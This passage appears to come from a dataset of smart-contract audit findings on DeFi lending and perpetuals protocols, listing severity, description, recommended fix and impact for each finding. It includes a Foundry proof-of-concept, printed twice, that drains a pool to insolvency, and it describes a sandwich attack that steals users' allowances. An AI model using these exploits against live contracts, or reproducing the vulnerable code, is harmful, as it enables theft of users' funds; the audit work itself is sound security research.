Notice how total pool debt is divided by number of loans to find the average loan debt size.\\n```\\n uint256 momp = _priceAt(\\n Deposits.findIndexOfSum(\\n deposits_,\\n Maths.wdiv(poolState_.debt, noOfLoans * 1e18)\\n )\\n );\\n```\\n\\nAn adversary can frontrun `kickAuction` by taking a huge loan, causing the price for which the amount of deposit above the undercollaterized loan bucket to have a lower probability of surpassing the average loan debt. The adversary can use the deposits for the buckets above and the total pool debt to figure out how much loan is necessary to grief the kicker significantly by lowering the MOMP and NP.",Recommend taking the snapshot average loan size of the pool to prevent frontrunning attacks.,"Kickers can be grieved which can disincentivize user from kicking loans that deserve to be liquidated, causing the protocol to not work as desired as undercollaterized loans will not be liquidated.",```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n +Auction timers following liquidity can fall through the floor price causing pool insolvency,medium,"When a borrower cannot pay their debt in an ERC20 pool, their position is liquidated and their assets enter an auction for other users to purchase small pieces of their assets. Because of the incentive that users wish to not pay above the standard market price for a token, users will generally wait until assets on auction are as cheap as possible to purchase however, this is flawed because this guarantees a loss for all lenders participating in the protocol with each user that is liquidated.\\nConsider a situation where a user decides to short a coin through a loan and refuses to take the loss to retain the value of their position. When the auction is kicked off using the `kick()` function on this user, as time moves forward, the price for puchasing these assets becomes increasingly cheaper. 
These prices can fall through the floor price of the lending pool which will allow anybody to buy tokens for only a fraction of what they were worth originally leading to a state where the pool cant cover the debt of the user who has not paid their loan back with interest. The issue lies in the `_auctionPrice()` function of the `Auctions.sol` contract which calculates the price of the auctioned assets for the taker. This function does not consider the floor price of the pool. The proof of concept below outlines this scenario:\\nProof of Concept:\\n```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, ""DAI / WETH Pool Three"");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n 
assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(""ERC20_NON_SUBSET_HASH"");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), """");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether 
instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\n","It's recommended that the price of the assets on auction consider the fenwick(s) being used when determining the price of assets on loan and do not fall below that particular index. With this fix in place, the worst case scenario is that lenders can pruchase these assets for the price they were loaned out for allowing them to recover the loss.",An increase in borrowers who cant pay their debts back will result in a loss for all lenders.,"```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, ""DAI / WETH Pool Three"");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit 
in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(""ERC20_NON_SUBSET_HASH"");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 
1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), """");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\n" +Incorrect MOMP calculation in neutral price calculation,medium,"When calculating MOMP to find the neutral price of a borrower, borrower's accrued debt is divided by the total number of loans in the pool, but it's total pool's debt that should be divided. The mistake will result in lower neutral prices and more lost bonds to kickers.\\nAs per the whitepaper:\\nMOMP: is the price at which the amount of deposit above it is equal to the average loan size of the pool. MOMP is short for “Most Optimistic Matching Price”, as it's the price at which a loan of average size would match with the most favorable lenders on the book.\\nI.e. 
MOMP is calculated on the total number of loans of a pool (so that the average loan size could be found).\\nMOMP calculation is implemented correctly when kicking a debt, however its implementation in the Loans.update function is not correct:\\n```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n\\nHere, only borrower's debt (borrowerAccruedDebt_) is divided, not the entire debt of the pool.",Issue Incorrect MOMP calculation in neutral price calculation\\nConsider using total pool's debt in the MOMP calculation in `Loans.update`.,"The miscalculation affects only borrower's neutral price calculation. Since MOMP is calculated on a smaller debt (borrower's debt will almost always be smaller than total pool's debt), the value of MOMP will be smaller than expected, and the neutral price will also be smaller (from the whitepaper: ""The NP of a loan is the interest-adjusted MOMP...""). This will cause kickers to lose their bonds more often than expected, as per the whitepaper:\\nIf the liquidation auction yields a value that is over the “Neutral Price,” NP, the kicker forfeits a portion or all of their bond.","```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n" +Lender force Loan become default,high,"in `repay()` directly transfer the debt token to Lender, but did not consider that Lender can not accept the token (in contract blacklist), resulting in `repay()` always revert, and finally the Loan can only expire, Loan be default\\nThe only way for the borrower to get the collateral token back is to repay the amount owed via repay(). Currently in the repay() method transfers the debt token directly to the Lender. 
This has a problem: if the Lender is blacklisted by the debt token now, the debtToken.transferFrom() method will fail and the repay() method will always fail and finally the Loan will default. Example: Assume collateral token = ETH,debt token = USDC, owner = alice 1.alice call request() to loan 2000 usdc , duration = 1 mon 2.bob call clear(): loanID =1 3.bob transfer loan[1].lender = jack by Cooler.approve/transfer\\nNote: jack has been in USDC's blacklist for some reason before or bob in USDC's blacklist for some reason now, it doesn't need transfer 'lender') 4.Sometime before the expiration date, alice call repay(id=1) , it will always revert, Because usdc.transfer(jack) will revert 5.after 1 mon, loan[1] default, jack call defaulted() get collateral token\\n```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\n","Instead of transferring the debt token directly, put the debt token into the Cooler.sol and set like: withdrawBalance[lender]+=amount, and provide the method withdraw() for lender to get debtToken back","Lender forced Loan become default for get collateral token, owner lost collateral token","```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\n" +`Cooler.roll()` wouldn't work as expected when `newCollateral = 0`.,medium,"`Cooler.roll()` is used to increase the loan duration by transferring the additional collateral.\\nBut there will be some problems when `newCollateral = 0`.\\n```\\n function roll (uint256 loanID) external {\\n 
Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n\\nIn `roll()`, it transfers the `newCollateral` amount of collateral to the contract.\\nAfter the borrower repaid most of the debts, `loan.amount` might be very small and `newCollateral` for the original interest might be 0 because of the rounding issue.\\nThen as we can see from this one, some tokens might revert for 0 amount and `roll()` wouldn't work as expected.","I think we should handle it differently when `newCollateral = 0`.\\nAccording to impact 2, I think it would be good to revert when `newCollateral = 0`.","There will be 2 impacts.\\nWhen the borrower tries to extend the loan using `roll()`, it will revert with the weird tokens when `newCollateral = 0`.\\nAfter the borrower noticed he couldn't repay anymore(so the lender will default the loan), the borrower can call `roll()` again when `newCollateral = 0`. 
In this case, the borrower doesn't lose anything but the lender must wait for `req.duration` again to default the loan.","```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n" +Loan is rollable by default,medium,"Making the loan rollable by default gives an unfair early advantage to the borrowers.\\nWhen clearing a new loan, the flag of `rollable` is set to true by default:\\n```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n\\nThis means a borrower can extend the loan anytime before the expiry:\\n```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n```\\n\\nIf the lenders do not intend to allow rollable loans, they should separately toggle the status to prevent that:\\n```\\n function toggleRoll(uint256 loanID) external returns (bool) {\\n // rest of code\\n loan.rollable = !loan.rollable;\\n // rest of code\\n }\\n```\\n\\nI believe it gives an unfair advantage to the borrower because they can re-roll the loan before the lender's transaction forbids this action.",I believe `rollable` should be set to false by default or at least add an extra function parameter to determine the initial value of this status.,"Lenders who do not want the loans to be used more than once, 
have to bundle their transactions. Otherwise, it is possible that someone might roll their loan, especially if the capital requirements are not huge because anyone can roll any loan.","```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n" +Use safeTransfer/safeTransferFrom consistently instead of transfer/transferFrom,high,"Use safeTransfer/safeTransferFrom consistently instead of transfer/transferFrom\\n```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\n",Consider using safeTransfer/safeTransferFrom consistently.,"If the token send fails, it will cause a lot of serious problems. 
For example, in the clear function, if debt token is ZRX, the lender can clear request without providing any debt token.","```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\n" +Fully repaying a loan will result in debt payment being lost,high,"When a `loan` is fully repaid the `loan` `storage` is deleted. Since `loan` is a `storage` reference to the `loan`, `loan.lender` will return `address(0)` after the `loan` has been deleted. This will result in the `debt` being transferred to `address(0)` instead of the lender. Some ERC20 tokens will revert when being sent to `address(0)` but a large number will simply be sent there and lost forever.\\n```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n\\nIn `Cooler#repay` the `loan` storage associated with the loanID being repaid is deleted. `loan` is a storage reference so when `loans[loanID]` is deleted so is `loan`. 
The result is that `loan.lender` is now `address(0)` and the `loan` payment will be sent there instead.","Send collateral/debt then delete:\\n```\\n- if (repaid == loan.amount) delete loans[loanID];\\n+ if (repaid == loan.amount) {\\n+ debt.transferFrom(msg.sender, loan.lender, loan.amount);\\n+ collateral.transfer(owner, loan.collateral);\\n+ delete loans[loanID];\\n+ return;\\n+ }\\n```\\n",Lender's funds are sent to `address(0)`,"```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n" +No check if Arbitrum L2 sequencer is down in Chainlink feeds,medium,"Using Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.\\n```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\n",Issue No check if Arbitrum L2 sequencer is down in Chainlink feeds,The impact depends on the usage of the GLP. 
If it is used as part of the collateral for lenders:\\nUsers can get better borrows if the price is above the actual price\\nUsers can avoid liquidations if the price is under the actual price,"```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\n" +GMX Reward Router's claimForAccount() can be abused to incorrectly add WETH to tokensIn,medium,"When `claimFees()` is called, the Controller automatically adds WETH to the user's account. However, in the case where no fees have accrued yet, there will not be WETH withdrawn. In this case, the user will have WETH added as an asset in their account, while they won't actually have any WETH holdings.\\nWhen a user calls the GMX Reward Router's `claimFees()` function, the RewardRouterController confirms the validity of this call in the `canCallClaimFees()` function:\\n```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n\\nThis function assumes that any user calling `claimFees()` will always receive `WETH`. However, this is only the case if their stake has been accruing.\\nImagine the following two actions are taken in the same block:\\nDeposit assets into GMX staking\\nCall claimFees()\\nThe result will be that `claimFees()` returns no `WETH`, but `WETH` is added to the account's asset list.\\nThe same is true if a user performs the following three actions:\\nCall claimFees()\\nWithdraw all ETH from the WETH contract\\nCall claimFees() again","The best way to solve this is actually not at the Controller level. 
It's to solve the issue of fake assets being added once and not have to worry about it on the Controller level in the future.\\nThis can be accomplished in `AccountManager.sol#_updateTokensIn()`. It should be updated to only add the token to the assets list if it has a positive balance, as follows:\\n```\\nfunction _updateTokensIn(address account, address[] memory tokensIn)\\n internal\\n{\\n uint tokensInLen = tokensIn.length;\\n for(uint i; i < tokensInLen; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false)\\n// Add the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false && IERC20(token).balanceOf(account) > 0)\\n IAccount(account).addAsset(tokensIn[i]);\\n }\\n}\\n```\\n\\nHowever, `_updateTokensIn()` is currently called before the function is executed in `exec()`, so that would need to be changed as well:\\n```\\nfunction exec(address account, address target, uint amt, bytes calldata data) external onlyOwner(account) {\\n bool isAllowed;\\n address[] memory tokensIn;\\n address[] memory tokensOut;\\n (isAllowed, tokensIn, tokensOut) = controller.canCall(target, (amt > 0), data);\\n if (!isAllowed) revert Errors.FunctionCallRestricted();\\n// Remove the line below\\n _updateTokensIn(account, tokensIn);\\n (bool success,) = IAccount(account).exec(target, amt, data);\\n if (!success)\\n revert Errors.AccountInteractionFailure(account, target, amt, data);\\n// Add the line below\\n _updateTokensIn(account, tokensIn);\\n _updateTokensOut(account, tokensOut);\\n if (!riskEngine.isAccountHealthy(account))\\n revert Errors.RiskThresholdBreached();\\n}\\n```\\n\\nWhile this fix does require changing a core contract, it would negate the need to worry about edge cases causing incorrect accounting of tokens on any future integrations, which I think is a worthwhile trade off.\\nThis accuracy is especially important as Sentiment becomes better known and integrated into the 
Arbitrum ecosystem. While I know that having additional assets doesn't cause internal problems at present, it is hard to predict what issues inaccurate data will cause in the future. Seeing that Plutus is checking Sentiment contracts for their whitelist drove this point home — we need to ensure the data stays accurate, even in edge cases, or else there will be trickle down problems we can't currently predict.","A user can force their account into a state where it has `WETH` on the asset list, but doesn't actually hold any `WETH`.\\nThis specific Impact was judged as Medium for multiple issues in the previous contest:","```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n" +PerpDespository#reblance and rebalanceLite can be called to drain funds from anyone who has approved PerpDepository,high,"PerpDespository#reblance and rebalanceLite allows anyone to specify the account that pays the quote token. These functions allow a malicious user to abuse any allowance provided to PerpDirectory. 
rebalance is the worst of the two because the malicious user could sandwich attack the rebalance to steal all the funds and force the unsuspecting user to pay the `shortfall`.\\n```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n\\n`rebalance` is an unpermissioned function that allows anyone to call and `rebalance` the PNL of the depository. 
It allows the caller to specify the an account that passes directly through to `_rebalanceNegativePnlWithSwap`\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n // @audit this uses user supplied swap parameters which can be malicious\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96,\\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n int256 shortFall = int256(\\n quoteAmount.fromDecimalToDecimal(18, ERC20(quoteToken).decimals())\\n ) - int256(quoteAmountOut);\\n if (shortFall > 0) {\\n // @audit shortfall is taken from account specified by user\\n IERC20(quoteToken).transferFrom(\\n account,\\n address(this),\\n uint256(shortFall)\\n );\\n } else if (shortFall < 0) {\\n // rest of code\\n }\\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\n`_rebalanceNegativePnlWithSwap` uses both user specified swap parameters and takes the shortfall from the account specified by the user. This is where the function can be abused to steal funds from any user that sets an allowance for this contract. A malicious user can sandwich attack the swap and specify malicious swap parameters to allow them to steal the entire rebalance. This creates a large shortfall which will be taken from the account that they specify, effectively stealing the funds from the user.\\nExample: Any `account` that gives the depository allowance can be stolen from. Imagine the following scenario. 
The multisig is going to rebalance the contract for 15000 USDC worth of ETH and based on current market conditions they are estimating that there will be a 1000 USDC shortfall because of the difference between the perpetual and spot prices (divergences between spot and perpetual price are common in trending markets). They first approve the depository for 1000 USDC. A malicious user sees this approval and immediately submits a transaction of their own. They request to rebalance only 1000 USDC worth of ETH and sandwich attack the swap to steal the rebalance. They specify the multisig as `account` and force it to pay the 1000 USDC shortfall and burn their entire allowance, stealing the USDC.","PerpDespository#reblance and rebalanceLite should use msg.sender instead of account:\\n```\\n function rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n- address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n- account \\n+ msg.sender\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n```\\n",Anyone that gives the depository allowance can easily have their entire allowance stolen,"```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address 
passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n" +USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralized,high,"PerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n 